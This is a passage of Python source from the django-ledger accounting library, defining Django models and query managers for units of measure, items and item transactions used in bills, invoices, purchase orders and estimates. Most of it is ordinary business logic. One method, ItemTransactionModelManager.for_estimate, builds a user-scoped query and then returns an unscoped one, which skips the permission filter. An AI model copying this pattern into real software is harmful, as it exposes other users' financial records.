Maximum of 50 characters.\n unit_abbr: str\n An abbreviation of the unit of measure used as an identifier or slug for URLs and queries.\n is_active: bool\n A boolean representing of the UnitOfMeasureModel instance is active to be used on new transactions.\n entity: EntityModel\n The EntityModel associated with the UnitOfMeasureModel instance.\n \"\"\"\n uuid = models.UUIDField(default=uuid4, editable=False, primary_key=True)\n name = models.CharField(max_length=50, verbose_name=_('Unit of Measure Name'))\n unit_abbr = models.SlugField(max_length=10, verbose_name=_('UoM Abbreviation'))\n is_active = models.BooleanField(default=True, verbose_name=_('Is Active'))\n\n # todo: rename to entity_model\n entity = models.ForeignKey('django_ledger.EntityModel',\n editable=False,\n on_delete=models.CASCADE,\n verbose_name=_('UoM Entity'))\n\n objects = UnitOfMeasureModelManager.from_queryset(queryset_class=UnitOfMeasureModelQuerySet)()\n\n class Meta:\n abstract = True\n indexes = [\n models.Index(fields=['entity'])\n ]\n unique_together = [\n ('entity', 'unit_abbr')\n ]\n\n def __str__(self):\n return f'{self.name} ({self.unit_abbr})'\n\n\n# ITEM MODEL....\nclass ItemModelQuerySet(models.QuerySet):\n \"\"\"\n A custom-defined ItemModelQuerySet that implements custom QuerySet methods related to the ItemModel.\n \"\"\"\n\n def active(self):\n \"\"\"\n Filters the QuerySet to only active Item Models.\n\n Returns\n -------\n ItemModelQuerySet\n A QuerySet with applied filters.\n \"\"\"\n return self.filter(is_active=True)\n\n def products(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as products.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=True) &\n Q(for_inventory=True)\n ) |\n Q(item_role=ItemModel.ITEM_ROLE_PRODUCT)\n )\n\n def services(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as services.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=True) &\n Q(for_inventory=False)\n ) |\n Q(item_role=ItemModel.ITEM_ROLE_SERVICE)\n )\n\n def expenses(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as expenses.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=False)\n ) | Q(item_role=ItemModel.ITEM_ROLE_EXPENSE)\n )\n\n def inventory_wip(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as inventory.\n These types of items cannot be sold as they are not considered a finished product.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=True)\n ) | Q(item_role=ItemModel.ITEM_ROLE_INVENTORY)\n )\n\n def inventory_all(self):\n \"\"\"\n Filters the QuerySet to ItemModels that only qualify as inventory.\n These types of items may be finished or unfinished.\n\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=True)\n ) | Q(item_role=ItemModel.ITEM_ROLE_INVENTORY)\n ) |\n (\n (\n Q(is_product_or_service=True) &\n Q(for_inventory=True)\n ) |\n Q(item_role=ItemModel.ITEM_ROLE_PRODUCT)\n\n )\n )\n\n def bills(self):\n \"\"\"\n Filters the QuerySet to ItemModels that are eligible only for bills..\n\n Returns\n -------\n 
ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n return self.filter(\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=False)\n ) |\n Q(for_inventory=True)\n )\n\n def invoices(self):\n return self.filter(is_product_or_service=True)\n\n def estimates(self):\n return self.invoices()\n\n def purchase_orders(self):\n return self.inventory_all()\n\n\nclass ItemModelManager(models.Manager):\n \"\"\"\n A custom defined ItemModelManager that implement custom QuerySet methods related to the ItemModel\n \"\"\"\n\n def for_entity(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModel associated with a specific EntityModel & UserModel.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.get_queryset()\n if isinstance(entity_slug, lazy_loader.get_entity_model()):\n return qs.filter(\n Q(entity=entity_slug) &\n (\n Q(entity__managers__in=[user_model]) |\n Q(entity__admin=user_model)\n )\n ).select_related('uom')\n return qs.filter(\n Q(entity__slug__exact=entity_slug) &\n (\n Q(entity__managers__in=[user_model]) |\n Q(entity__admin=user_model)\n )\n ).select_related('uom')\n\n def for_entity_active(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of Active ItemModel associated with a specific EntityModel & UserModel.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(is_active=True)\n\n def for_invoice(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for InvoiceModels for a specific EntityModel &\n UserModel. These types of items qualify as products or services sold.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity_active(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(is_product_or_service=True)\n\n def for_bill(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for BillModels for a specific EntityModel &\n UserModel. 
These types of items qualify as expenses or inventory purchases.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity_active(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(\n (\n Q(is_product_or_service=False) &\n Q(for_inventory=False)\n ) |\n Q(for_inventory=True)\n )\n\n def for_po(self, entity_slug, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for PurchaseOrders for a specific EntityModel &\n UserModel. These types of items qualify as inventory purchases.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.inventory_all()\n\n def for_estimate(self, entity_slug: str, user_model):\n \"\"\"\n Returns a QuerySet of ItemModels that can only be used for EstimateModels for a specific EntityModel &\n UserModel. These types of items qualify as products.\n May pass an instance of EntityModel or a String representing the EntityModel slug.\n\n Parameters\n ----------\n entity_slug: str or EntityModel\n The entity slug or EntityModel used for filtering the QuerySet.\n user_model\n The request UserModel to check for privileges.\n\n Returns\n -------\n ItemModelQuerySet\n A Filtered ItemModelQuerySet.\n \"\"\"\n qs = self.for_entity_active(entity_slug=entity_slug, user_model=user_model)\n return qs.products()\n\n\nclass ItemModelAbstract(CreateUpdateMixIn):\n \"\"\"\n Base implementation of the ItemModel.\n\n Attributes\n ----------\n uuid: UUID\n This is a unique primary key generated for the table. The default value of this field is uuid4().\n name: str\n Human readable name of the ItemModel instance. Maximum of 100 characters.\n item_role: str\n A choice of ITEM_ROLE_CHOICES that determines whether the ItemModel should be treated as an expense, inventory,\n service or product.\n item_type: str\n A choice of ITEM_TYPE_CHOICES that determines whether the ItemModel should be treated as labor, material,\n equipment, lump sum or other.\n uom: UnitOfMeasureModel\n The assigned UnitOfMeasureModel of the ItemModel instance. Mandatory.\n sku: str\n The SKU number associated with the ItemModel instance. Maximum 50 characters.\n upc: str\n The UPC number associated with the ItemModel instance. Maximum 50 characters.\n item_id: str\n EntityModel specific id associated with the ItemModel instance. Maximum 50 characters.\n item_number: str\n Auto generated human-readable item number.\n is_active: bool\n Determines if the ItemModel instance is considered active. Defaults to True.\n default_amount: Decimal\n The default, prepopulated monetary amount of the ItemModel instance .\n for_inventory: bool\n Legacy field used to determine if the ItemModel instance is considered an inventory item. Mandatory.\n Superseded by item_role field. 
Will be deprecated.\n is_product_or_service: bool\n Legacy field used to determine if the ItemModel instance is considered a product or service item. Mandatory.\n Superseded by item_role field. Will be deprecated.\n sold_as_unit: bool\n Determines if only whole numbers can be used when specifying the quantity on ItemTransactionModels.\n inventory_account: AccountModel\n Inventory account associated with the ItemModel instance. Enforced if ItemModel instance is_inventory() is True.\n inventory_received: Decimal\n Holds the total quantity of the inventory received for the whole EntityModel instance.\n inventory_received_value: Decimal\n Holds the total monetary value of the inventory received for the whole EntityModel instance.\n cogs_account: AccountModel\n COGS account associated with the ItemModel instance. Enforced if ItemModel instance is_inventory() is True.\n earnings_account: AccountModel\n Earnings account associated with the ItemModel instance. Enforced if ItemModel instance is_product() or\n is_service() is True.\n expense_account: AccountModel\n Expense account associated with the ItemModel instance. Enforced if ItemModel instance is_expense() is True.\n additional_info: dict\n Additional user defined information stored as JSON document in the Database.\n entity: EntityModel\n The EntityModel associated with the ItemModel instance.\n \"\"\"\n REL_NAME_PREFIX = 'item'\n\n ITEM_TYPE_LABOR = 'L'\n ITEM_TYPE_MATERIAL = 'M'\n ITEM_TYPE_EQUIPMENT = 'E'\n ITEM_TYPE_LUMP_SUM = 'S'\n ITEM_TYPE_OTHER = 'O'\n ITEM_TYPE_CHOICES = [\n (ITEM_TYPE_LABOR, _('Labor')),\n (ITEM_TYPE_MATERIAL, _('Material')),\n (ITEM_TYPE_EQUIPMENT, _('Equipment')),\n (ITEM_TYPE_LUMP_SUM, _('Lump Sum')),\n (ITEM_TYPE_OTHER, _('Other')),\n ]\n ITEM_TYPE_VALID_CHOICES = {i[0] for i in ITEM_TYPE_CHOICES}\n\n ITEM_ROLE_EXPENSE = 'expense'\n ITEM_ROLE_INVENTORY = 'inventory'\n ITEM_ROLE_SERVICE = 'service'\n ITEM_ROLE_PRODUCT = 'product'\n ITEM_ROLE_CHOICES = [\n ('expense', _('Expense')),\n ('inventory', _('Inventory')),\n ('service', _('Service')),\n ('product', _('Product')),\n ]\n\n uuid = models.UUIDField(default=uuid4, editable=False, primary_key=True)\n name = models.CharField(max_length=100, verbose_name=_('Item Name'))\n\n # todo: rename this and remove 'id' from it.\n item_id = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('Internal ID'))\n item_number = models.CharField(max_length=30, editable=False, verbose_name=_('Item Number'))\n item_role = models.CharField(max_length=10, choices=ITEM_ROLE_CHOICES, null=True, blank=True)\n item_type = models.CharField(max_length=1, choices=ITEM_TYPE_CHOICES, null=True, blank=True)\n\n uom = models.ForeignKey('django_ledger.UnitOfMeasureModel',\n verbose_name=_('Unit of Measure'),\n on_delete=models.RESTRICT)\n\n sku = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('SKU Code'))\n upc = models.CharField(max_length=50, blank=True, null=True, verbose_name=_('UPC Code'))\n\n is_active = models.BooleanField(default=True, verbose_name=_('Is Active'))\n\n default_amount = models.DecimalField(max_digits=20,\n decimal_places=2,\n default=0,\n verbose_name=_('Default monetary value per unit of measure'),\n validators=[MinValueValidator(0)])\n\n for_inventory = models.BooleanField(verbose_name=_('Is an item for inventory'),\n help_text=_('It is an item you require for your inventory.'))\n\n is_product_or_service = models.BooleanField(verbose_name=_('Is a product or service.'),\n help_text=_(\n 'Is a product or service you sell or provide 
to customers.'\n ))\n\n sold_as_unit = models.BooleanField(default=False)\n\n inventory_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('Inventory Account'),\n related_name=f'{REL_NAME_PREFIX}_inventory_account',\n help_text=_('Inventory account where cost will be capitalized.'),\n on_delete=models.RESTRICT)\n inventory_received = models.DecimalField(\n null=True,\n blank=True,\n decimal_places=3,\n max_digits=20,\n verbose_name=_('Total inventory received.'))\n inventory_received_value = models.DecimalField(\n null=True,\n blank=True,\n decimal_places=2,\n max_digits=20,\n verbose_name=_('Total value of inventory received.'))\n cogs_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('COGS Account'),\n related_name=f'{REL_NAME_PREFIX}_cogs_account',\n help_text=_('COGS account where cost will be recognized on Income Statement.'),\n on_delete=models.RESTRICT)\n earnings_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('Earnings Account'),\n related_name=f'{REL_NAME_PREFIX}_earnings_account',\n help_text=_('Earnings account where revenue will be recognized on Income Statement.'),\n on_delete=models.RESTRICT)\n expense_account = models.ForeignKey(\n 'django_ledger.AccountModel',\n null=True,\n blank=True,\n verbose_name=_('Expense Account'),\n related_name=f'{REL_NAME_PREFIX}_expense_account',\n help_text=_('Expense account where cost will be recognized on Income Statement.'),\n on_delete=models.RESTRICT)\n\n additional_info = models.JSONField(blank=True,\n null=True,\n default=dict,\n verbose_name=_('Item Additional Info'))\n\n # todo: rename to entity_model...\n entity = models.ForeignKey('django_ledger.EntityModel',\n editable=False,\n on_delete=models.CASCADE,\n verbose_name=_('Item Entity'))\n\n objects = ItemModelManager.from_queryset(queryset_class=ItemModelQuerySet)()\n\n class Meta:\n abstract = True\n unique_together = [\n ('entity', 'item_number')\n ]\n indexes = [\n models.Index(fields=['item_number']),\n models.Index(fields=['item_type']),\n models.Index(fields=['item_role']),\n models.Index(fields=['upc']),\n models.Index(fields=['sku']),\n models.Index(fields=['for_inventory']),\n models.Index(fields=['is_product_or_service']),\n models.Index(fields=['is_active'])\n ]\n\n def __str__(self):\n if self.is_expense():\n return f'Expense: {self.name} | {self.get_item_type_display()}'\n elif self.is_inventory():\n return f'Inventory: {self.name} | {self.get_item_type_display()}'\n elif self.is_service():\n return f'Service: {self.name} | {self.get_item_type_display()}'\n elif self.is_product():\n return f'Product: {self.name}'\n return f'Item Model: {self.name} - {self.sku} | {self.get_item_type_display()}'\n\n def is_expense(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_EXPENSE\n if all([\n not self.is_product_or_service,\n not self.for_inventory\n ]):\n self.item_role = self.ITEM_ROLE_EXPENSE\n return True\n return False\n\n def is_inventory(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_INVENTORY\n\n if all([\n not self.is_product_or_service,\n self.for_inventory,\n ]):\n self.item_role = self.ITEM_ROLE_INVENTORY\n return True\n return False\n\n def is_product(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_PRODUCT\n\n if all([\n self.is_product_or_service,\n self.for_inventory,\n not self.is_labor()\n ]):\n self.item_role = self.ITEM_ROLE_PRODUCT\n 
return True\n return False\n\n def is_service(self):\n if self.item_role:\n return self.item_role == self.ITEM_ROLE_SERVICE\n if all([\n self.is_product_or_service,\n not self.for_inventory,\n self.is_labor()\n ]):\n self.item_role = self.ITEM_ROLE_SERVICE\n return True\n return False\n\n def product_or_service_display(self):\n if self.is_product():\n return 'product'\n elif self.is_service():\n return 'service'\n\n def is_labor(self):\n return self.item_type == self.ITEM_TYPE_LABOR\n\n def is_material(self):\n return self.item_type == self.ITEM_TYPE_MATERIAL\n\n def is_equipment(self):\n return self.item_type == self.ITEM_TYPE_EQUIPMENT\n\n def is_lump_sum(self):\n return self.item_type == self.ITEM_TYPE_LUMP_SUM\n\n def is_other(self):\n return self.item_type == self.ITEM_TYPE_OTHER\n\n def get_average_cost(self) -> Decimal:\n if self.inventory_received:\n try:\n return self.inventory_received_value / self.inventory_received\n except ZeroDivisionError:\n pass\n return Decimal('0.00')\n\n def get_item_number_prefix(self):\n if self.is_expense():\n return DJANGO_LEDGER_EXPENSE_NUMBER_PREFIX\n elif self.is_inventory():\n return DJANGO_LEDGER_INVENTORY_NUMBER_PREFIX\n elif self.is_product() or self.is_service():\n return DJANGO_LEDGER_PRODUCT_NUMBER_PREFIX\n raise ItemModelValidationError('Cannot determine Item Number prefix for ItemModel. '\n f'For Inventory: {self.for_inventory}, '\n f'IsProductOrService: {self.is_product_or_service}, '\n f'Type: {self.item_type} '\n f'IsLabor: {self.is_labor()} ')\n\n def can_generate_item_number(self) -> bool:\n return all([\n self.entity_id,\n not self.item_number\n ])\n\n def _get_next_state_model(self, raise_exception: bool = True):\n EntityStateModel = lazy_loader.get_entity_state_model()\n\n try:\n LOOKUP = {\n 'entity_model_id__exact': self.entity_id,\n 'key__exact': EntityStateModel.KEY_ITEM\n }\n\n state_model_qs = EntityStateModel.objects.filter(**LOOKUP).select_for_update()\n state_model = state_model_qs.get()\n state_model.sequence = F('sequence') + 1\n state_model.save()\n state_model.refresh_from_db()\n\n return state_model\n except ObjectDoesNotExist:\n\n LOOKUP = {\n 'entity_model_id': self.entity_id,\n 'entity_unit_id': None,\n 'fiscal_year': None,\n 'key': EntityStateModel.KEY_ITEM,\n 'sequence': 1\n }\n state_model = EntityStateModel.objects.create(**LOOKUP)\n return state_model\n except IntegrityError as e:\n if raise_exception:\n raise e\n\n def generate_item_number(self, commit: bool = False) -> str:\n \"\"\"\n Atomic Transaction. 
Generates the next Vendor Number available.\n @param commit: Commit transaction into VendorModel.\n @return: A String, representing the current InvoiceModel instance Document Number.\n \"\"\"\n if self.can_generate_item_number():\n with transaction.atomic(durable=True):\n\n state_model = None\n while not state_model:\n state_model = self._get_next_state_model(raise_exception=False)\n\n seq = str(state_model.sequence).zfill(DJANGO_LEDGER_DOCUMENT_NUMBER_PADDING)\n self.item_number = f'{self.get_item_number_prefix()}-{seq}'\n\n if commit:\n self.save(update_fields=['item_number'])\n\n return self.item_number\n\n def save(self, **kwargs):\n if self.can_generate_item_number():\n self.generate_item_number(commit=False)\n super(ItemModelAbstract, self).save(**kwargs)\n\n def clean(self):\n\n if self.can_generate_item_number():\n self.generate_item_number(commit=False)\n\n if self.is_expense():\n if not self.expense_account_id:\n raise ItemModelValidationError(_('Items must have an associated expense accounts.'))\n if not self.item_type:\n raise ItemModelValidationError(_('Expenses must have a type.'))\n self.inventory_account = None\n self.earnings_account = None\n self.cogs_account = None\n self.for_inventory = False\n self.is_product_or_service = False\n\n elif self.is_product():\n if not all([\n self.inventory_account_id,\n self.cogs_account_id,\n self.earnings_account_id\n ]):\n raise ItemModelValidationError(_('Products must have Inventory, COGS & Earnings accounts.'))\n if self.is_labor():\n raise ItemModelValidationError(_(f'Product must not be labor...'))\n self.expense_account = None\n self.for_inventory = True\n self.is_product_or_service = True\n\n elif self.is_service():\n if not all([\n self.cogs_account_id,\n self.earnings_account_id\n ]):\n raise ItemModelValidationError(_('Services must have COGS & Earnings accounts.'))\n self.inventory_account = None\n self.expense_account = None\n self.for_inventory = False\n self.is_product_or_service = True\n self.item_type = self.ITEM_TYPE_LABOR\n\n elif self.is_inventory():\n if not all([\n self.inventory_account_id,\n ]):\n raise ItemModelValidationError(_('Items for inventory must have Inventory & COGS accounts.'))\n if not self.item_type:\n raise ItemModelValidationError(_('Inventory items must have a type.'))\n self.expense_account = None\n self.earnings_account = None\n self.for_inventory = True\n self.is_product_or_service = False\n\n\n# ITEM TRANSACTION MODELS...\nclass ItemTransactionModelQuerySet(models.QuerySet):\n\n def is_received(self):\n return self.filter(po_item_status=ItemTransactionModel.STATUS_RECEIVED)\n\n def in_transit(self):\n return self.filter(po_item_status=ItemTransactionModel.STATUS_IN_TRANSIT)\n\n def is_ordered(self):\n return self.filter(po_item_status=ItemTransactionModel.STATUS_ORDERED)\n\n def is_orphan(self):\n return self.filter(\n Q(bill_model_id__isnull=True) &\n Q(po_model_id__isnull=True) &\n Q(ce_model_id__isnull=True)\n )\n\n def get_estimate_aggregate(self):\n return {\n 'ce_cost_estimate__sum': sum(i.ce_cost_estimate for i in self),\n 'ce_revenue_estimate__sum': sum(i.ce_revenue_estimate for i in self),\n 'total_items': len(self)\n }\n\n\nclass ItemTransactionModelManager(models.Manager):\n\n def for_entity(self, user_model, entity_slug):\n qs = self.get_queryset()\n return qs.filter(\n Q(item_model__entity__slug__exact=entity_slug) &\n (\n Q(item_model__entity__admin=user_model) |\n Q(item_model__entity__managers__in=[user_model])\n )\n )\n\n def for_bill(self, user_model, entity_slug, 
bill_pk):\n qs = self.for_entity(user_model=user_model, entity_slug=entity_slug)\n return qs.filter(bill_model_id__exact=bill_pk)\n\n def for_invoice(self, entity_slug: str, invoice_pk, user_model):\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(invoice_model_id__exact=invoice_pk)\n\n def for_po(self, entity_slug, user_model, po_pk):\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return qs.filter(po_model__uuid__exact=po_pk)\n\n def for_estimate(self, user_model, entity_slug, cj_pk):\n qs = self.for_entity(entity_slug=entity_slug, user_model=user_model)\n return self.filter(ce_model_id__exact=cj_pk)\n\n def for_contract(self, user_model, entity_slug, ce_pk):\n \"\"\"\n Returns all ItemTransactionModels associated with an EstimateModel.\n @param user_model: UserModel requesting data.\n @param entity_slug: EntityModel slug field value.\n @param ce_pk: EstimateModel UUID.\n @return: ItemTransactionModel QuerySet\n \"\"\"\n qs = self.for_entity(\n entity_slug=entity_slug,\n user_model=user_model\n )\n return qs.filter(\n Q(ce_model_id__exact=ce_pk) |\n Q(po_model__ce_model_id__exact=ce_pk) |\n Q(bill_model__ce_model_id__exact=ce_pk) |\n Q(invoice_model__ce_model_id__exact=ce_pk)\n )\n\n # INVENTORY METHODS....\n def for_entity_inventory(self, entity_slug):\n qs = self.get_queryset()\n return qs.filter(item_model__entity__slug__exact=entity_slug)\n\n # Todo move this to QuerySet....\n def inventory_count(self, entity_slug):\n PurchaseOrderModel = lazy_loader.get_purchase_order_model()\n qs = self.for_entity_inventory(entity_slug)\n qs = qs.filter(\n Q(item_model__for_inventory=True) &\n (\n # received inventory...\n (\n Q(bill_model__isnull=False) &\n Q(po_model__po_status=PurchaseOrderModel.PO_STATUS_APPROVED) &\n Q(po_item_status__exact=ItemTransactionModel.STATUS_RECEIVED)\n ) |\n\n # invoiced inventory...\n (\n Q(invoice_model__isnull=False)\n )\n\n )\n )\n\n return qs.values('item_model_id', 'item_model__name', 'item_model__uom__name').annotate(\n quantity_received=Coalesce(\n Sum('quantity', filter=Q(bill_model__isnull=False) & Q(invoice_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n cost_received=Coalesce(\n Sum('total_amount', filter=Q(bill_model__isnull=False) & Q(invoice_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n quantity_invoiced=Coalesce(\n Sum('quantity', filter=Q(invoice_model__isnull=False) & Q(bill_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n revenue_invoiced=Coalesce(\n Sum('total_amount', filter=Q(invoice_model__isnull=False) & Q(bill_model__isnull=True)), Value(0.0),\n output_field=DecimalField()),\n ).annotate(\n quantity_onhand=Coalesce(F('quantity_received') - F('quantity_invoiced'), Value(0.0),\n output_field=DecimalField()),\n cost_average=Case(\n When(quantity_received__gt=0.0,\n then=ExpressionWrapper(F('cost_received') / F('quantity_received'),\n output_field=DecimalField(decimal_places=3))\n )\n ),\n value_onhand=Coalesce(\n ExpressionWrapper(F('quantity_onhand') * F('cost_average'),\n output_field=DecimalField(decimal_places=3)), Value(0.0), output_field=DecimalField())\n )\n\n def inventory_pipeline(self, entity_slug):\n qs = self.for_entity_inventory(entity_slug)\n return qs.filter(\n Q(item_model__for_inventory=True) &\n Q(bill_model__isnull=False) &\n Q(po_item_status__in=[\n ItemTransactionModel.STATUS_ORDERED,\n ItemTransactionModel.STATUS_IN_TRANSIT,\n ItemTransactionModel.STATUS_RECEIVED,\n ])\n )\n\n def 
inventory_pipeline_aggregate(self, entity_slug: str):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.values(\n 'item_model__name',\n 'item_model__uom__name',\n 'po_item_status').annotate(\n total_quantity=Sum('quantity'),\n total_value=Sum('total_amount')\n )\n\n def inventory_pipeline_ordered(self, entity_slug):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.filter(po_item_status=ItemTransactionModel.STATUS_ORDERED)\n\n def inventory_pipeline_in_transit(self, entity_slug):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.filter(po_item_status=ItemTransactionModel.STATUS_IN_TRANSIT)\n\n def inventory_pipeline_received(self, entity_slug):\n qs = self.inventory_pipeline(entity_slug=entity_slug)\n return qs.filter(po_item_status=ItemTransactionModel.STATUS_RECEIVED)\n\n def inventory_invoiced(self, entity_slug):\n qs = self.for_entity_inventory(entity_slug)\n return qs.filter(\n Q(item_model__for_inventory=True) &\n Q(invoice_model__isnull=False)\n )\n\n\nclass ItemTransactionModelAbstract(CreateUpdateMixIn):\n DECIMAL_PLACES = 2\n\n STATUS_NOT_ORDERED = 'not_ordered'\n STATUS_ORDERED = 'ordered'\n STATUS_IN_TRANSIT = 'in_transit'\n STATUS_RECEIVED = 'received'\n STATUS_CANCELED = 'cancelled'\n\n PO_ITEM_STATUS = [\n (STATUS_NOT_ORDERED, _('Not Ordered')),\n (STATUS_ORDERED, _('Ordered')),\n (STATUS_IN_TRANSIT, _('In Transit')),\n (STATUS_RECEIVED, _('Received')),\n (STATUS_CANCELED, _('Canceled')),\n ]\n\n uuid = models.UUIDField(default=uuid4, editable=False, primary_key=True)\n entity_unit = models.ForeignKey('django_ledger.EntityUnitModel',\n on_delete=models.RESTRICT,\n blank=True,\n null=True,\n verbose_name=_('Associated Entity Unit'))\n item_model = models.ForeignKey('django_ledger.ItemModel',\n on_delete=models.RESTRICT,\n verbose_name=_('Item Model'))\n bill_model = models.ForeignKey('django_ledger.BillModel',\n on_delete=models.RESTRICT,\n null=True,\n blank=True,\n verbose_name=_('Bill Model'))\n invoice_model = models.ForeignKey('django_ledger.InvoiceModel',\n on_delete=models.RESTRICT,\n null=True,\n blank=True,\n verbose_name=_('Invoice Model'))\n\n # LEDGER TRANSACTION Fields (Bill/Invoice)....\n quantity = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Quantity'),\n validators=[MinValueValidator(limit_value=0.0)])\n unit_cost = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Cost Per Unit'),\n validators=[MinValueValidator(limit_value=0.0)])\n total_amount = models.DecimalField(max_digits=20,\n editable=False,\n null=True,\n blank=True,\n decimal_places=DECIMAL_PLACES,\n verbose_name=_('Total Amount QTY x UnitCost'),\n validators=[MinValueValidator(limit_value=0.0)])\n\n # Purchase Order fields...\n po_model = models.ForeignKey('django_ledger.PurchaseOrderModel',\n on_delete=models.RESTRICT,\n null=True,\n blank=True,\n verbose_name=_('Purchase Order Model'))\n po_quantity = models.FloatField(null=True,\n blank=True,\n verbose_name=_('PO Quantity'),\n help_text=_('Authorized item quantity for purchasing.'),\n validators=[MinValueValidator(limit_value=0.0)])\n po_unit_cost = models.FloatField(null=True,\n blank=True,\n verbose_name=_('PO Unit Cost'),\n help_text=_('Purchase Order unit cost.'),\n validators=[MinValueValidator(limit_value=0.0)])\n po_total_amount = models.DecimalField(max_digits=20,\n decimal_places=DECIMAL_PLACES,\n null=True,\n blank=True,\n editable=False,\n verbose_name=_('Authorized maximum item cost per Purchase Order'),\n help_text=_('Maximum authorized cost per 
Purchase Order.'),\n validators=[MinValueValidator(limit_value=0.0)])\n po_item_status = models.CharField(max_length=15,\n choices=PO_ITEM_STATUS,\n blank=True,\n null=True,\n verbose_name=_('PO Item Status'))\n\n # Estimate/Contract fields...\n ce_model = models.ForeignKey('django_ledger.EstimateModel',\n null=True,\n blank=True,\n verbose_name=_('Customer Estimate'),\n on_delete=models.RESTRICT)\n ce_quantity = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Estimated/Contract Quantity'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_unit_cost_estimate = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Estimate/Contract Cost per Unit.'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_cost_estimate = models.DecimalField(max_digits=20,\n null=True,\n blank=True,\n decimal_places=DECIMAL_PLACES,\n editable=False,\n verbose_name=_('Total Estimate/Contract Cost.'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_unit_revenue_estimate = models.FloatField(null=True,\n blank=True,\n verbose_name=_('Estimate/Contract Revenue per Unit.'),\n validators=[MinValueValidator(limit_value=0.0)])\n ce_revenue_estimate = models.DecimalField(max_digits=20,\n null=True,\n blank=True,\n decimal_places=DECIMAL_PLACES,\n editable=False,\n verbose_name=_('Total Estimate/Contract Revenue.'),\n validators=[MinValueValidator(limit_value=0.0)])\n item_notes = models.CharField(max_length=400, null=True, blank=True, verbose_name=_('Description'))\n objects = ItemTransactionModelManager.from_queryset(queryset_class=ItemTransactionModelQuerySet)()\n\n class Meta:\n abstract = True\n indexes = [\n models.Index(fields=['bill_model', 'item_model']),\n models.Index(fields=['invoice_model', 'item_model']),\n models.Index(fields=['po_model', 'item_model']),\n models.Index(fields=['ce_model', 'item_model']),\n models.Index(fields=['po_item_status'])\n ]\n\n def __str__(self):\n # pylint: disable=no-member\n\n # amount = f'{currency_symbol}{self.total_amount}'\n if self.po_model_id:\n po_status_display = self.get_po_item_status_display()\n return f'PO 